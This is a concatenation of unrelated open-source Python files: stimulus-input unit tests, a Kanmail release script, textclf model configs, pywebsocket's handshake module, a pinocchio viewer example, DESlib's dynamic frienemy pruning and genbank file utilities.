self.assertDictEqual(params, {"n": 2, "seed": 42, **UPDATE})
class TestWienerProcess(unittest.TestCase):
def test_generate_input(self):
dW = WienerProcess(n=2, seed=42).generate_input(duration=DURATION, dt=DT)
self.assertTrue(isinstance(dW, np.ndarray))
self.assertTupleEqual(dW.shape, SHAPE)
def test_get_params(self):
dW = WienerProcess(n=2, seed=42)
params = dW.get_params()
params.pop("type")
self.assertDictEqual(params, {"n": 2, "seed": 42})
def test_set_params(self):
dW = WienerProcess(n=2, seed=42)
UPDATE = {"seed": 6152, "n": 5}
dW.update_params(UPDATE)
params = dW.get_params()
params.pop("type")
self.assertDictEqual(params, {"n": 2, "seed": 42, **UPDATE})
class TestOrnsteinUhlenbeckProcess(unittest.TestCase):
def test_generate_input(self):
ou = OrnsteinUhlenbeckProcess(
mu=3.0,
sigma=0.1,
tau=2 * DT,
n=2,
seed=42,
).generate_input(duration=DURATION, dt=DT)
self.assertTrue(isinstance(ou, np.ndarray))
self.assertTupleEqual(ou.shape, SHAPE)
def test_get_params(self):
ou = OrnsteinUhlenbeckProcess(
mu=3.0,
sigma=0.1,
tau=2 * DT,
n=2,
seed=42,
)
params = ou.get_params()
params.pop("type")
self.assertDictEqual(params, {"n": 2, "seed": 42, "mu": 3.0, "sigma": 0.1, "tau": 2 * DT})
def test_set_params(self):
ou = OrnsteinUhlenbeckProcess(
mu=3.0,
sigma=0.1,
tau=2 * DT,
n=2,
seed=42,
)
UPDATE = {"mu": 2.3, "seed": 12}
ou.update_params(UPDATE)
params = ou.get_params()
params.pop("type")
self.assertDictEqual(params, {"n": 2, "seed": 42, "mu": 3.0, "sigma": 0.1, "tau": 2 * DT, **UPDATE})
class TestStepInput(unittest.TestCase):
STEP_SIZE = 2.3
def test_generate_input(self):
step = StepInput(
step_size=self.STEP_SIZE,
n=2,
seed=42,
).generate_input(duration=DURATION, dt=DT)
self.assertTrue(isinstance(step, np.ndarray))
self.assertTupleEqual(step.shape, SHAPE)
np.testing.assert_allclose(step, self.STEP_SIZE)
def test_start_end_input(self):
step = StepInput(
start=STIM_START,
end=STIM_END,
step_size=self.STEP_SIZE,
n=2,
seed=42,
).as_array(duration=DURATION, dt=DT)
np.testing.assert_allclose(step[:, : int(STIM_START / DT)], 0.0)
np.testing.assert_allclose(step[:, int(STIM_END / DT) :], 0.0)
class TestSinusoidalInput(unittest.TestCase):
AMPLITUDE = 2.3
FREQUENCY = 1000.0
def test_generate_input(self):
sin = SinusoidalInput(
amplitude=self.AMPLITUDE, frequency=self.FREQUENCY, n=2, seed=42, dc_bias=True
).generate_input(duration=DURATION, dt=DT)
self.assertTrue(isinstance(sin, np.ndarray))
self.assertTupleEqual(sin.shape, SHAPE)
np.testing.assert_almost_equal(np.mean(sin, axis=1), np.array(2 * [self.AMPLITUDE]))
def test_start_end_input(self):
sin = SinusoidalInput(
start=STIM_START,
end=STIM_END,
amplitude=self.AMPLITUDE,
frequency=self.FREQUENCY,
n=2,
seed=42,
).as_array(duration=DURATION, dt=DT)
np.testing.assert_allclose(sin[:, : int(STIM_START / DT)], 0.0)
np.testing.assert_allclose(sin[:, int(STIM_END / DT) :], 0.0)
def test_get_params(self):
sin = SinusoidalInput(
start=STIM_START,
end=STIM_END,
amplitude=self.AMPLITUDE,
frequency=self.FREQUENCY,
n=2,
seed=42,
)
params = sin.get_params()
params.pop("type")
self.assertDictEqual(
params,
{
"n": 2,
"seed": 42,
"frequency": self.FREQUENCY,
"amplitude": self.AMPLITUDE,
"start": STIM_START,
"dc_bias": False,
"end": STIM_END,
},
)
def test_set_params(self):
sin = SinusoidalInput(
start=STIM_START,
end=STIM_END,
amplitude=self.AMPLITUDE,
frequency=self.FREQUENCY,
n=2,
seed=42,
)
UPDATE = {"amplitude": 43.0, "seed": 12, "start": "None"}
sin.update_params(UPDATE)
params = sin.get_params()
params.pop("type")
self.assertDictEqual(
params,
{
"n": 2,
"seed": 42,
"frequency": self.FREQUENCY,
"amplitude": self.AMPLITUDE,
"dc_bias": False,
"end": STIM_END,
**UPDATE,
"start": None,
},
)
class TestSquareInput(unittest.TestCase):
AMPLITUDE = 2.3
FREQUENCY = 20.0
def test_generate_input(self):
sq = SquareInput(
amplitude=self.AMPLITUDE,
frequency=self.FREQUENCY,
n=2,
seed=42,
).generate_input(duration=DURATION, dt=DT)
self.assertTrue(isinstance(sq, np.ndarray))
self.assertTupleEqual(sq.shape, SHAPE)
np.testing.assert_almost_equal(np.mean(sq, axis=1), np.array(2 * [self.AMPLITUDE]))
def test_start_end_input(self):
sq = SquareInput(
start=STIM_START,
end=STIM_END,
amplitude=self.AMPLITUDE,
frequency=self.FREQUENCY,
n=2,
seed=42,
).as_array(duration=DURATION, dt=DT)
np.testing.assert_allclose(sq[:, : int(STIM_START / DT)], 0.0)
np.testing.assert_allclose(sq[:, int(STIM_END / DT) :], 0.0)
def test_get_params(self):
sq = SquareInput(
start=STIM_START,
end=STIM_END,
amplitude=self.AMPLITUDE,
frequency=self.FREQUENCY,
n=2,
seed=42,
)
params = sq.get_params()
params.pop("type")
self.assertDictEqual(
params,
{
"n": 2,
"seed": 42,
"frequency": self.FREQUENCY,
"amplitude": self.AMPLITUDE,
"start": STIM_START,
"end": STIM_END,
"dc_bias": False,
},
)
def test_set_params(self):
sq = SquareInput(
start=STIM_START,
end=STIM_END,
amplitude=self.AMPLITUDE,
frequency=self.FREQUENCY,
n=2,
seed=42,
)
UPDATE = {"amplitude": 43.0, "seed": 12, "start": "None"}
sq.update_params(UPDATE)
params = sq.get_params()
params.pop("type")
self.assertDictEqual(
params,
{
"n": 2,
"seed": 42,
"frequency": self.FREQUENCY,
"amplitude": self.AMPLITUDE,
"end": STIM_END,
"dc_bias": False,
**UPDATE,
"start": None,
},
)
class TestLinearRampInput(unittest.TestCase):
INP_MAX = 5.0
RAMP_LENGTH = 2.0
def test_generate_input(self):
ramp = LinearRampInput(
inp_max=self.INP_MAX,
ramp_length=self.RAMP_LENGTH,
n=2,
seed=42,
).generate_input(duration=DURATION, dt=DT)
self.assertTrue(isinstance(ramp, np.ndarray))
self.assertTupleEqual(ramp.shape, SHAPE)
np.testing.assert_equal(np.max(ramp, axis=1), np.array(2 * [self.INP_MAX]))
np.testing.assert_equal(np.min(ramp, axis=1), np.array(2 * [0.25]))
def test_start_end_input(self):
ramp = LinearRampInput(
start=STIM_START,
end=STIM_END,
inp_max=self.INP_MAX,
ramp_length=self.RAMP_LENGTH,
n=2,
seed=42,
).as_array(duration=DURATION, dt=DT)
np.testing.assert_allclose(ramp[:, : int(STIM_START / DT)], 0.0)
np.testing.assert_allclose(ramp[:, int(STIM_END / DT) :], 0.0)
def test_get_params(self):
ramp = LinearRampInput(
start=STIM_START,
end=STIM_END,
inp_max=self.INP_MAX,
ramp_length=self.RAMP_LENGTH,
n=2,
seed=42,
)
params = ramp.get_params()
params.pop("type")
self.assertDictEqual(
params,
{
"n": 2,
"seed": 42,
"inp_max": self.INP_MAX,
"ramp_length": self.RAMP_LENGTH,
"start": STIM_START,
"end": STIM_END,
},
)
def test_set_params(self):
ramp = LinearRampInput(
start=STIM_START,
end=STIM_END,
inp_max=self.INP_MAX,
ramp_length=self.RAMP_LENGTH,
n=2,
seed=42,
)
UPDATE = {"inp_max": 41.0, "seed": 12}
ramp.update_params(UPDATE)
params = ramp.get_params()
params.pop("type")
self.assertDictEqual(
params,
{
"n": 2,
"seed": 42,
"inp_max": self.INP_MAX,
"ramp_length": self.RAMP_LENGTH,
"start": STIM_START,
"end": STIM_END,
**UPDATE,
},
)
class TestExponentialInput(unittest.TestCase):
INP_MAX = 5.0
EXP_COEF = 30.0
EXP_TYPE = "rise"
def test_generate_input_rise(self):
exp_rise = ExponentialInput(
inp_max=self.INP_MAX,
exp_type="rise",
n=2,
seed=42,
).generate_input(duration=DURATION, dt=DT)
self.assertTrue(isinstance(exp_rise, np.ndarray))
self.assertTupleEqual(exp_rise.shape, SHAPE)
np.testing.assert_almost_equal(np.max(exp_rise, axis=1), np.array(2 * [self.INP_MAX]))
self.assertTrue(np.all(np.diff(exp_rise) >= 0))
def test_generate_input_decay(self):
exp_decay = ExponentialInput(
inp_max=self.INP_MAX,
exp_type="decay",
n=2,
seed=42,
).generate_input(duration=DURATION, dt=DT)
self.assertTrue(isinstance(exp_decay, np.ndarray))
self.assertTupleEqual(exp_decay.shape, SHAPE)
self.assertTrue(np.all(np.diff(exp_decay) <= 0))
def test_start_end_input(self):
exp_rise = ExponentialInput(
start=STIM_START,
end=STIM_END,
inp_max=self.INP_MAX,
n=2,
seed=42,
).as_array(duration=DURATION, dt=DT)
np.testing.assert_allclose(exp_rise[:, : int(STIM_START / DT)], 0.0)
np.testing.assert_allclose(exp_rise[:, int(STIM_END / DT) :], 0.0)
def test_get_params(self):
exp_rise = ExponentialInput(
start=STIM_START,
end=STIM_END,
inp_max=self.INP_MAX,
n=2,
seed=42,
)
params = exp_rise.get_params()
params.pop("type")
self.assertDictEqual(
params,
{
"n": 2,
"seed": 42,
"inp_max": self.INP_MAX,
"exp_coef": self.EXP_COEF,
"exp_type": self.EXP_TYPE,
"start": STIM_START,
"end": STIM_END,
},
)
def test_set_params(self):
exp_rise = ExponentialInput(
start=STIM_START,
end=STIM_END,
inp_max=self.INP_MAX,
n=2,
seed=42,
)
UPDATE = {"inp_max": 41.0, "seed": 12}
exp_rise.update_params(UPDATE)
params = exp_rise.get_params()
params.pop("type")
self.assertDictEqual(
params,
{
"n": 2,
"seed": 42,
"inp_max": self.INP_MAX,
"exp_coef": self.EXP_COEF,
"exp_type": self.EXP_TYPE,
"start": STIM_START,
"end": STIM_END,
**UPDATE,
},
)
class TestSummedStimulus(unittest.TestCase):
def _create_input(self):
ou = OrnsteinUhlenbeckProcess(mu=0.1, sigma=0.02, tau=2.0, n=2)
sq = SquareInput(amplitude=0.2, frequency=50, n=2, start=5)
sin = SinusoidalInput(amplitude=0.1, frequency=100, n=2, start=2)
step = StepInput(step_size=0.5, n=2, start=7)
return sq + (sin + step + ou)
def test_init(self):
summed = self._create_input()
self.assertEqual(len(summed), 4)
self.assertTrue(isinstance(summed, SummedStimulus))
self.assertEqual(summed.n, 2)
self.assertEqual(len(summed.inputs), 4)
def test_set_n(self):
summed = self._create_input()
self.assertEqual(summed.n, 2)
ts = summed.as_array(duration=DURATION, dt=DT)
self.assertEqual(ts.shape[0], 2)
summed.n = 5
self.assertEqual(summed.n, 5)
ts = summed.as_array(duration=DURATION, dt=DT)
self.assertEqual(ts.shape[0], 5)
def test_generate_input(self):
summed = self._create_input()
ts = summed.as_array(duration=DURATION, dt=DT)
self.assertTrue(isinstance(ts, np.ndarray))
self.assertTupleEqual(ts.shape, SHAPE)
ts = summed.as_cubic_splines(duration=DURATION, dt=DT)
self.assertTrue(isinstance(ts, CubicHermiteSpline))
def test_get_params(self):
summed = self._create_input()
params = summed.get_params()
self.assertTrue(isinstance(params, dict))
self.assertEqual(len(params), 1 + len(summed.inputs))
for i, process in enumerate(summed):
self.assertDictEqual(process.get_params(), params[f"input_{i}"])
def test_update_params(self):
summed = self._create_input()
UPDATE_DICT = {f"input_{i}": {"n": 3} for i in range(len(summed))}
summed.update_params(UPDATE_DICT)
self.assertEqual(summed.n, 3)
class TestConcatenatedStimulus(unittest.TestCase):
def _create_input(self):
ou = OrnsteinUhlenbeckProcess(mu=0.1, sigma=0.02, tau=2.0, n=2)
sq = SquareInput(amplitude=0.2, frequency=20.0, n=2)
sin = SinusoidalInput(amplitude=0.1, frequency=10.0, n=2)
step = StepInput(step_size=0.5, n=2)
return ou & (sq & sin & step)
def test_init(self):
conc = self._create_input()
self.assertEqual(len(conc), 4)
self.assertTrue(isinstance(conc, ConcatenatedStimulus))
self.assertEqual(conc.n, 2)
self.assertEqual(len(conc.inputs), 4)
def test_set_n(self):
conc = self._create_input()
self.assertEqual(conc.n, 2)
ts = conc.as_array(duration=DURATION, dt=DT)
self.assertEqual(ts.shape[0], 2)
conc.n = 5
self.assertEqual(conc.n, 5)
ts = conc.as_array(duration=DURATION, dt=DT)
self.assertEqual(ts.shape[0], 5)
def test_generate_input(self):
conc = self._create_input()
ts = conc.as_array(duration=DURATION, dt=DT)
self.assertTrue(isinstance(ts, np.ndarray))
self.assertTupleEqual(ts.shape, SHAPE)
ts = conc.as_cubic_splines(duration=DURATION, dt=DT)
self.assertTrue(isinstance(ts, CubicHermiteSpline))
def test_get_params(self):
conc = self._create_input()
params = conc.get_params()
self.assertTrue(isinstance(params, dict))
self.assertEqual(len(params), 1 + len(conc.inputs))
for i, process in enumerate(conc):
self.assertDictEqual(process.get_params(), params[f"input_{i}"])
def test_update_params(self):
conc = self._create_input()
UPDATE_DICT = {f"input_{i}": {"n": 3} for i in range(len(conc))}
conc.update_params(UPDATE_DICT)
self.assertEqual(conc.n, 3)
class TestBeastInput(unittest.TestCase):
def _create_input(self):
ou = OrnsteinUhlenbeckProcess(mu=0.1, sigma=0.02, tau=2.0, n=2)
sq = SquareInput(amplitude=0.2, frequency=20.0, n=2)
sin = SinusoidalInput(amplitude=0.1, frequency=10.0, n=2)
step = StepInput(step_size=0.5, n=2)
return (sq + sin) & (step + ou)
def test_init(self):
beast = self._create_input()
self.assertEqual(len(beast), 2)
self.assertTrue(isinstance(beast, ConcatenatedStimulus))
for process in beast:
self.assertTrue(isinstance(process, SummedStimulus))
self.assertEqual(beast.n, 2)
def test_set_n(self):
beast = self._create_input()
self.assertEqual(beast.n, 2)
ts = beast.as_array(duration=DURATION, dt=DT)
self.assertEqual(ts.shape[0], 2)
beast.n = 5
self.assertEqual(beast.n, 5)
ts = beast.as_array(duration=DURATION, dt=DT)
self.assertEqual(ts.shape[0], 5)
def test_generate_input(self):
beast = self._create_input()
ts = beast.as_array(duration=DURATION, dt=DT)
self.assertTrue(isinstance(ts, np.ndarray))
self.assertTupleEqual(ts.shape, SHAPE)
ts = beast.as_cubic_splines(duration=DURATION, dt=DT)
self.assertTrue(isinstance(ts, CubicHermiteSpline))
def test_get_params(self):
beast = self._create_input()
params = beast.get_params()
self.assertTrue(isinstance(params, dict))
self.assertEqual(len(params), 1 + len(beast.inputs))
for i, process in enumerate(beast):
self.assertDictEqual(process.get_params(), params[f"input_{i}"])
class TestRectifiedInput(unittest.TestCase):
def test_init(self):
rect = RectifiedInput(0.2, n=2)
self.assertTrue(isinstance(rect, ConcatenatedStimulus))
self.assertEqual(len(rect), 5)
self.assertEqual(rect.n, 2)
def test_generate(self):
rect = RectifiedInput(0.2, n=2)
ts = rect.as_array(DURATION, DT)
self.assertTrue(isinstance(ts, np.ndarray))
self.assertTupleEqual(ts.shape, SHAPE)
ts = rect.as_cubic_splines(duration=DURATION, dt=DT)
self.assertTrue(isinstance(ts, CubicHermiteSpline))
if __name__ == "__main__":
unittest.main()
|
make/release.py | frznvm0/Kanmail | 1,118 | 12750825 | from os import path
import click
from .settings import NEW_BUILDS_DIRNAME
from .util import print_and_run, read_version_data
def _wait_for_build(filename):
click.echo('Build the client in another window, and return here afterwards')
version = read_version_data()['version']
filename = path.join(NEW_BUILDS_DIRNAME, filename.format(version=version))
while True:
if click.confirm('Has the build completed? '):
if path.exists(filename):
return
click.echo(f'File {filename} not found, please try again.')
@click.command()
def do_release():
print_and_run(('python', '-m', 'make.clean'))
print_and_run(('python', '-m', 'make', '--release'))
if click.confirm('Build Docker container?', default=True):
print_and_run(('python', '-m', 'make', '--docker', '--release'))
if click.confirm('Build MacOS client? ', default=True):
_wait_for_build('Kanmail-mac-{version}.tar.gz')
if click.confirm('Build Windows client? ', default=True):
_wait_for_build('Kanmail-win-{version}.zip')
if click.confirm('Build Linux client? ', default=False):
_wait_for_build('Kanmail-nix64-{version}.tar.gz')
print_and_run(('python', '-m', 'make', '--release', '--complete'))
if __name__ == '__main__':
do_release()
|
textclf/config/ml_model.py | lswjkllc/textclf | 146 | 12750832 | <reponame>lswjkllc/textclf
"""各种模型的设置"""
from typing import Union, Optional, Dict
from .base import ConfigBase
class MLModelConfig(ConfigBase):
pass
class LogisticRegressionConfig(MLModelConfig):
"""参考:https://scikit-learn.org/stable/modules/generated/sklearn.linear_model.LogisticRegression.html"""
# penalty{‘l1’, ‘l2’, ‘elasticnet’, ‘none’} Used to specify the norm used in the penalization.
penalty: str = "l2"
# Dual or primal formulation. Dual formulation is only implemented
# for l2 penalty with liblinear solver. Prefer dual=False when n_samples > n_features.
dual: bool = False
# Tolerance for stopping criteria.
tol: float = 1e-4
# Inverse of regularization strength
# must be a positive float. Like in support vector machines, smaller values specify stronger regularization.
C: float = 1.0
# Specifies if a constant(a.k.a. bias or intercept) should be added to the decision function.
fit_intercept: bool = True
# Useful only when the solver ‘liblinear’ is used and self.fit_intercept is set to True.
intercept_scaling: float = 1
# dict or ‘balanced’ or None, default="balanced"
# Weights associated with classes in the form {class_label: weight}.
# If not given, all classes are supposed to have weight one.
# The “balanced” mode uses the values of y to automatically adjust weights
# inversely proportional to class frequencies in the input data as n_samples / (n_classes * np.bincount(y)).
class_weight: Union[str, None, Dict[str, float]] = "balanced"
# {‘newton-cg’, ‘lbfgs’, ‘liblinear’, ‘sag’, ‘saga’}
# Algorithm to use in the optimization problem.
# For small datasets, ‘liblinear’ is a good choice, whereas ‘sag’ and ‘saga’ are faster for large ones.
solver: str = 'sag'
# Maximum number of iterations taken for the solvers to converge.
max_iter: int = 1000
# multi_class{‘auto’, ‘ovr’, ‘multinomial’} =’auto’
multi_class: str = 'ovr'
# For the liblinear and lbfgs solvers set verbose to any positive number for verbosity.
verbose: int = 0
# The seed of the pseudo random number generator to use when shuffling the data.
# If int, random_state is the seed used by the random number generator
# If None, the random number generator is the RandomState instance used
# by np.random. Used when solver == ‘sag’ or ‘liblinear’.
random_state: int = None
# Number of CPU cores used when parallelizing over classes if multi_class =’ovr’”. T
n_jobs: int = None
# The Elastic-Net mixing parameter, with 0 <= l1_ratio <= 1.
l1_ratio: Optional[float] = None
class LinearSVMConfig(MLModelConfig):
# dict or ‘balanced’ or None, default="balanced"
# Weights associated with classes in the form {class_label: weight}.
# If not given, all classes are supposed to have weight one.
# The “balanced” mode uses the values of y to automatically adjust weights
# inversely proportional to class frequencies in the input data as n_samples / (n_classes * np.bincount(y)).
class_weight: Union[str, None, Dict[str, float]] = "balanced"
# The penalty (aka regularization term) to be used. Defaults to ‘l2’ which is the standard regularizer for linear
# SVM models. ‘l1’ and ‘elasticnet’ might bring sparsity to the model (feature selection) not achievable with ‘l2’.
penalty: str = 'l2'
# Constant that multiplies the regularization term. Defaults to 0.0001.
# Also used to compute learning_rate when set to ‘optimal’.
alpha: float = 0.0001
# The Elastic Net mixing parameter, with 0 <= l1_ratio <= 1. l1_ratio = 0 corresponds to
# L2 penalty, l1_ratio = 1 to L1. Defaults to 0.15.
l1_ratio: float = 0.15
# Whether the intercept should be estimated or not. If False, the data is assumed to be already centered.
fit_intercept: bool = True
# The maximum number of passes over the training data(aka epochs).
# It only impacts the behavior in the fit method, and not the partial_fit method.
max_iter: int = 1000
# The stopping criterion. If it is not None, the iterations will stop when(loss > best_loss - tol)
# for n_iter_no_change consecutive epochs.
tolfloat = 1e-3
# Whether or not the training data should be shuffled after each epoch.
shufflebool = True
# The verbosity level.
verboseint = 0
# The number of CPUs to use to do the OVA(One Versus All, for multi-class problems) computation. None means 1
# unless in a joblib.parallel_backend context. -1 means using all processors. See Glossary for more details.
n_jobs: int = None
# The seed of the pseudo random number generator to use when shuffling the data. If int, random_state is the
# seed used by the random number generator
# If RandomState instance, random_state is the random number generator
# If None, the random number generator is the RandomState instance used by np.random.
random_state: Optional[int] = None
# Number of iterations with no improvement to wait before early stopping.
n_iter_no_change: int = 5
|
tools/third_party/pywebsocket3/mod_pywebsocket/handshake/__init__.py | spao234/wpt | 575 | 12750838 | <filename>tools/third_party/pywebsocket3/mod_pywebsocket/handshake/__init__.py
# Copyright 2011, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""WebSocket opening handshake processor. This class try to apply available
opening handshake processors for each protocol version until a connection is
successfully established.
"""
from __future__ import absolute_import
import logging
from mod_pywebsocket import common
from mod_pywebsocket.handshake import hybi
# Export AbortedByUserException, HandshakeException, and VersionException
# symbol from this module.
from mod_pywebsocket.handshake._base import AbortedByUserException
from mod_pywebsocket.handshake._base import HandshakeException
from mod_pywebsocket.handshake._base import VersionException
_LOGGER = logging.getLogger(__name__)
def do_handshake(request, dispatcher):
"""Performs WebSocket handshake.
Args:
request: mod_python request.
dispatcher: Dispatcher (dispatch.Dispatcher).
Handshaker will add attributes such as ws_resource in performing
handshake.
"""
_LOGGER.debug('Client\'s opening handshake resource: %r', request.uri)
# To print mimetools.Message as escaped one-line string, we converts
# headers_in to dict object. Without conversion, if we use %r, it just
# prints the type and address, and if we use %s, it prints the original
# header string as multiple lines.
#
# Both mimetools.Message and MpTable_Type of mod_python can be
# converted to dict.
#
# mimetools.Message.__str__ returns the original header string.
# dict(mimetools.Message object) returns the map from header names to
# header values. While MpTable_Type doesn't have such __str__ but just
# __repr__ which formats itself as well as dictionary object.
_LOGGER.debug('Client\'s opening handshake headers: %r',
dict(request.headers_in))
handshakers = []
handshakers.append(('RFC 6455', hybi.Handshaker(request, dispatcher)))
for name, handshaker in handshakers:
_LOGGER.debug('Trying protocol version %s', name)
try:
handshaker.do_handshake()
_LOGGER.info('Established (%s protocol)', name)
return
except HandshakeException as e:
_LOGGER.debug(
'Failed to complete opening handshake as %s protocol: %r',
name, e)
if e.status:
raise e
except AbortedByUserException as e:
raise
except VersionException as e:
raise
# TODO(toyoshim): Add a test to cover the case all handshakers fail.
raise HandshakeException(
'Failed to complete opening handshake for all available protocols',
status=common.HTTP_STATUS_BAD_REQUEST)
# vi:sts=4 sw=4 et
|
examples/gepetto-viewer.py | Sreevis/pinocchio | 716 | 12750857 | # NOTE: this example needs gepetto-gui to be installed
# usage: launch gepetto-gui and then run this test
import pinocchio as pin
import numpy as np
import sys
import os
from os.path import dirname, join, abspath
from pinocchio.visualize import GepettoVisualizer
# Load the URDF model.
# Conversion with str seems to be necessary when executing this file with ipython
pinocchio_model_dir = join(dirname(dirname(str(abspath(__file__)))),"models")
model_path = join(pinocchio_model_dir,"example-robot-data/robots")
mesh_dir = pinocchio_model_dir
urdf_filename = "talos_reduced.urdf"
urdf_model_path = join(join(model_path,"talos_data/robots"),urdf_filename)
model, collision_model, visual_model = pin.buildModelsFromUrdf(urdf_model_path, mesh_dir, pin.JointModelFreeFlyer())
viz = GepettoVisualizer(model, collision_model, visual_model)
# Initialize the viewer.
try:
viz.initViewer()
except ImportError as err:
print("Error while initializing the viewer. It seems you should install gepetto-viewer")
print(err)
sys.exit(0)
try:
viz.loadViewerModel("pinocchio")
except AttributeError as err:
print("Error while loading the viewer model. It seems you should start gepetto-viewer")
print(err)
sys.exit(0)
# Display a robot configuration.
q0 = pin.neutral(model)
viz.display(q0)
# Display another robot.
viz2 = GepettoVisualizer(model, collision_model, visual_model)
viz2.initViewer(viz.viewer)
viz2.loadViewerModel(rootNodeName = "pinocchio2")
q = q0.copy()
q[1] = 1.0
viz2.display(q)
|
deslib/util/dfp.py | vishalbelsare/DESlib | 310 | 12750884 | <filename>deslib/util/dfp.py
"""Implementation of the Dynamic Frienemy Pruning (DFP) algorithm for online
pruning of base classifiers.
References
----------
<NAME>., <NAME>. and <NAME>., Online Pruning
of Base Classifiers for Dynamic Ensemble Selection,
Pattern Recognition, vol. 72, December 2017, pp 44-58.
Cruz, <NAME>, <NAME>, <NAME>, and <NAME>.
"FIRE-DES++: Enhanced online pruning of base classifiers for dynamic ensemble
selection." Pattern Recognition 85 (2019): 149-160.
"""
# coding=utf-8
# Author: <NAME> <<EMAIL>>
#
# License: BSD 3 clause
import numpy as np
from sklearn.neighbors import KNeighborsClassifier
def frienemy_pruning(X_query, X_dsel, y_dsel, ensemble, k):
"""Implements the Online Pruning method (frienemy) which prunes base
classifiers that do not cross the region of competence of a given instance.
A classifier crosses the region of competence if it correctly
classify at least one sample for each different class in the region.
Parameters
----------
X_query : array-like of shape (n_samples, n_features)
Test set.
X_dsel : array-like of shape (n_samples, n_features)
Dynamic selection set.
y_dsel : array-like of shape (n_samples,)
The target values (Dynamic selection set).
ensemble : list of shape = [n_classifiers]
The ensemble of classifiers to be pruned.
k : int
Number of neighbors used to compute the regions of competence.
Returns
-------
DFP_mask : array-like of shape = [n_samples, n_classifiers]
Mask containing 1 for the selected base classifier and 0
otherwise.
"""
predictions = np.zeros((X_dsel.shape[0], len(ensemble)),
dtype=np.intp)
for index, clf in enumerate(ensemble):
predictions[:, index] = clf.predict(X_dsel)
hit_miss = predictions == y_dsel[:, np.newaxis]
competence_region = KNeighborsClassifier(n_neighbors=k).fit(X_dsel, y_dsel)
neighbors = competence_region.kneighbors(X_query, return_distance=False)
return frienemy_pruning_preprocessed(neighbors, y_dsel, hit_miss)
def frienemy_pruning_preprocessed(neighbors, y_val, hit_miss):
"""Implements the Online Pruning method (frienemy) which prunes base
classifiers that do not cross the region of competence of a given instance.
    A classifier crosses the region of competence if it correctly
    classifies at least one sample for each different class in the region.
Notes
-----
This implementation assumes the regions of competence of each query example
(neighbors) and the predictions for the dynamic selection data (hit_miss)
were already pre-computed.
Parameters
----------
neighbors : array-like of shape (n_samples, n_neighbors)
Indices of the k nearest neighbors.
y_val : array-like of shape (n_samples,)
The target values (class labels).
hit_miss : array-like of shape (n_samples, n_classifiers)
Matrix containing 1 when the base classifier made the correct
prediction, 0 otherwise.
Returns
-------
DFP_mask : array-like of shape = [n_samples, n_classifiers]
Mask containing 1 for the selected base classifier and 0
otherwise.
"""
if neighbors.ndim < 2:
neighbors = neighbors.reshape(1, -1)
n_samples = neighbors.shape[0]
n_classifiers = hit_miss.shape[1]
dfp_mask = np.zeros((n_samples, n_classifiers))
# TODO: vectorize this code?
for sample_idx in range(n_samples):
curr_neighbors = neighbors[sample_idx]
neighbors_y = y_val[curr_neighbors]
if len(set(neighbors_y)) > 1:
            # Indecision region. Check if the base classifier predicts the
# correct label for a sample belonging to each class.
for clf_index in range(n_classifiers):
[mask] = np.where(hit_miss[curr_neighbors, clf_index])
if len(set(neighbors_y[mask])) > 1:
dfp_mask[sample_idx, clf_index] = 1.0
else:
# Safe region.
dfp_mask[sample_idx, :] = 1.0
    # rows where all classifiers were pruned are set to 1.0
dfp_mask[np.all(dfp_mask == 0, axis=1)] = 1.0
return dfp_mask
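# Usage sketch: a minimal way to exercise frienemy_pruning on a toy problem.
# The synthetic dataset, the pool of shallow decision trees and k=7 are
# illustrative assumptions, not part of DESlib itself.
if __name__ == "__main__":
    from sklearn.datasets import make_classification
    from sklearn.model_selection import train_test_split
    from sklearn.tree import DecisionTreeClassifier
    X, y = make_classification(n_samples=200, random_state=0)
    X_train, X_dsel, y_train, y_dsel = train_test_split(X, y, random_state=0)
    # A small, deliberately weak pool of base classifiers.
    pool = [DecisionTreeClassifier(max_depth=depth,
                                   random_state=0).fit(X_train, y_train)
            for depth in (1, 2, 3)]
    # One row per query sample, one column per base classifier; 1 keeps the
    # classifier for dynamic selection, 0 prunes it.
    dfp_mask = frienemy_pruning(X_dsel[:5], X_dsel, y_dsel, pool, k=7)
    print(dfp_mask)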
|
src/hg/makeDb/genbank/src/lib/py/genbank/fileOps.py | andypohl/kent | 171 | 12750893 | """Miscellaneous file operations"""
import os,os.path,errno
def ensureDir(dir):
"""Ensure that a directory exists, creating it (and parents) if needed."""
try:
os.makedirs(dir)
    except OSError as e:
if e.errno != errno.EEXIST:
raise e
def ensureFileDir(fname):
"""Ensure that the directory for a file exists, creating it (and parents) if needed.
Returns the directory path"""
dir = os.path.dirname(fname)
if len(dir) > 0:
ensureDir(dir)
return dir
else:
return "."
def prLine(fh, *objs):
"write each str(obj) followed by a newline"
for o in objs:
fh.write(str(o))
fh.write("\n")
def prStrs(fh, *objs):
"write each str(obj), with no newline"
for o in objs:
fh.write(str(o))
def prRow(fh, row):
"""Print a row (list or tupe) to a tab file.
Does string conversion on each columns"""
first = True
for col in row:
if not first:
fh.write("\t")
fh.write(str(col))
first = False
fh.write("\n")
def prRowv(fh, *objs):
"""Print a row from each argument to a tab file.
    Does string conversion on each column"""
first = True
for col in objs:
if not first:
fh.write("\t")
fh.write(str(col))
first = False
fh.write("\n")
